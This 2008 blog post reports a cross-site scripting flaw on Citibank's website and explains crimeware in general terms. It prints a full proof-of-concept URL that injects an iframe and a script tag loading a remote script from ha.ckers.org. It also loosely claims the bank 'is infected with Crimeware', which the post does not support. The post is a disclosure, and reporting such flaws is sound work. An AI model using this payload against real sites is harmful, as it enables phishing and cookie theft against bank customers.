Home | About | Help Center | Privacy Policy

Try Our "Facebook App"

August 18th, 2008

Citibank is not safe – new vulnerabilities


http://farm4.static.flickr.com/3088/2772069987_e61bec33bc_m.jpgRecent news from xssed.com revealed a new vulnerabilities of Citibank which is count in as worlds major bank.

What is the actual problem?

Actually due to new xss vulnerabilities its very easy for a phishers to display a Citibank phishing page until their victim’s session cookie expires or gets deleted.

Citibank.com XSS and display following link on its window:
http://www.citibank.com/domain/contact/index.htm?_u=visitor&_uid=&_profile=
“/><iframesrc=http://google.com></iframe><scriptsrc=http://ha.ckers.org/xss.js?/>
&_products=NNNNNNNNNNNNNNNNN&_ll=&_mid=&_dta=&_m=0&_cn=&_j=
&_jcontext=/US&_jfp=false&BVE=https://web.da-us.citibank.com&BVP=/cgi-bin/citifi/scripts/
&BV_UseBVCookie=yes

http://farm4.static.flickr.com/3044/2772069837_ae27a9de45_m.jpg

As discovered citibank is infected with Crimeware.For those who don’t know about crime ware-

Crimeware is a class of malware designed specifically to automate financial crime.It also often has the intent to export confidential or sensitive information from a network for financial exploitation.Crimeware can enable remote access into applications, allowing hackers to break into networks for malicious purposes.It can surreptitiously install keystroke loggers to collect sensitive data—login and password information for online bank accounts.

Our source reveals that “Both flaws can be exploited by malicious people to conduct phishing attacks with a higher success rate and to infect Citibank’s clients with crimeware.”

~shout~
“Could someone inform the authority of citibank to fix this bug”



You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackbackfrom your own site.

Subscribe to our FREE Rss Feed

Hot in Social Media


10 Ways Social Media Can Help Your Business

10 Best Social Media Case Studies

10 Tips To Become Social Without Using Social Media

Top 10 Tips To Enhance Personal Branding

What's Hot

Similar Interesting Posts

Tutorials On

2 Responses to “Citibank is not safe – new vulnerabilities”

  1. amit pal singh Says:

    hey this is a real hack, how come a city bank website shows a google logo?
    hall of shame..

  2. Fantastic blog, many amusing details. I think 6 of days ago, I have viewed a similar post.

Leave a Reply

CommentLuv Enabled

Additional comments powered by BackType

    Follow @honeytech On Twitter

    Google Calendar Gets Smart Rescheduler http://bit.ly/dfvRlv
  • Subscribe For Tips


  • Top Fans Of The Day

  • Sponsors

Hot Tags

google Social open source How to WordPress Plugin mobile Designs Windows Linux browser blogging iphone Social media ubuntu mistakes Internet Web design Firefox free tips